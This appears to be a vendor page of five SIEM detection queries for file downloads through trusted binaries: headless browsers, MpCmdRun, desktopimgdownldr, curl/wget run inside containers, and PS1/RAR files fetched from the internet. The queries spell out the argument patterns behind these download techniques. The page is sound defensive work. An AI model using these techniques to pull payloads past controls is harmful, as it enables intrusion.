Deployable detection rules
5 vendor-native detections · ready to paste into your SIEM · cross-linked to ATT&CK
◈
Detections
5 shown of 5Potential File Download via a Headless Browser
Identifies headless browser execution from a suspicious parent process with arguments consistent with scripted retrieval. Adversaries use browsers because they are trusted, signed binaries that proxy and application-control policies allow through, bypassing restrictions on direct download tools.
Show query
process where host.os.type == "windows" and event.type == "start" and
process.name : ("chrome.exe", "msedge.exe", "brave.exe", "browser.exe", "dragon.exe", "vivaldi.exe") and
process.args : "--headless*" and
process.args : ("--dump-dom", "*http*", "data:text/html;base64,*") and
process.parent.name :
("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "conhost.exe", "msiexec.exe",
"explorer.exe", "rundll32.exe", "winword.exe", "excel.exe", "onenote.exe", "hh.exe", "powerpnt.exe", "forfiles.exe",
"pcalua.exe", "wmiprvse.exe") and
not process.executable : (
"?:\\inetpub\\wwwroot\\*\\ext\\modules\\html2pdf\\bin\\chrome\\*\\chrome-win64\\chrome.exe",
"\\Device\\HarddiskVolume*\\inetpub\\wwwroot\\*\\ext\\modules\\html2pdf\\bin\\chrome\\*\\chrome-win64\\chrome.exe"
)
Curl or Wget Execution from Container Context
Detects execution of curl or wget from processes whose title aligns with **`runc init`**, a common fingerprint
for workloads running inside **OCI/runc-backed containers** on Linux hosts instrumented with Auditd Manager.
After breaking out of an application container or abusing a privileged workload, attackers often pull ingress tooling
(stagers, scripts, implants) or stage exfiltration with minimal HTTP clients. Those utilities are also used
benignly in images, so context matters; the `runc init` anchor narrows the signal to the container runtime boundary
where unexpected download clients are more worthy of review than the same binaries on a bare-metal admin shell.
Show query
host.os.type:linux and
data_stream.dataset:"auditd_manager.auditd" and
event.action:("executed" or "exec") and
process.title:"runc init" and
(
process.name:(curl or wget) or
process.args:(* curl* or */bin/curl* or *wget*)
) and
not process.args :(*127.0.0.1* or *localhost* or "wget --no-verbose --tries=1 --spider --no-check-certificate http://${WEB_HOST}:${WEB_PORT}/api/ping || exit 1")
Remote File Download via Desktopimgdownldr Utility
Identifies the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to
download arbitrary files as an alternative to certutil.
Show query
process where host.os.type == "windows" and event.type == "start" and (process.name : "desktopimgdownldr.exe" or ?process.pe.original_file_name == "desktopimgdownldr.exe") and process.args : "/lockscreenurl:http*"
Remote File Download via MpCmdRun
Identifies the Windows Defender configuration utility (MpCmdRun.exe) being used to download a remote file.
Show query
process where host.os.type == "windows" and event.type == "start" and (process.name : "MpCmdRun.exe" or ?process.pe.original_file_name == "MpCmdRun.exe") and process.args : "-DownloadFile" and process.args : "-url" and process.args : "-path"
Roshal Archive (RAR) or PowerShell File Downloaded from the Internet
Detects a Roshal Archive (RAR) file or PowerShell script downloaded from the internet by an internal host. Gaining
initial access to a system and then downloading encoded or encrypted tools to move laterally is a common practice for
adversaries as a way to protect their more valuable tools and tactics, techniques, and procedures (TTPs). This may be
atypical behavior for a managed network and can be indicative of malware, exfiltration, or command and control.
Show query
(data_stream.dataset: (network_traffic.http or network_traffic.tls) or
(event.category: (network or network_traffic) and network.protocol: http)) and
(url.extension:(ps1 or rar) or url.path:(*.ps1 or *.rar)) and
not destination.ip:(
10.0.0.0/8 or
127.0.0.0/8 or
169.254.0.0/16 or
172.16.0.0/12 or
192.0.0.0/24 or
192.0.0.0/29 or
192.0.0.8/32 or
192.0.0.9/32 or
192.0.0.10/32 or
192.0.0.170/32 or
192.0.0.171/32 or
192.0.2.0/24 or
192.31.196.0/24 or
192.52.193.0/24 or
192.168.0.0/16 or
192.88.99.0/24 or
224.0.0.0/4 or
100.64.0.0/10 or
192.175.48.0/24 or
198.18.0.0/15 or
198.51.100.0/24 or
203.0.113.0/24 or
240.0.0.0/4 or
"::1" or
"FE80::/10" or
"FF00::/8"
) and
source.ip:(
10.0.0.0/8 or
172.16.0.0/12 or
192.168.0.0/16
)
Showing 1-5 of 5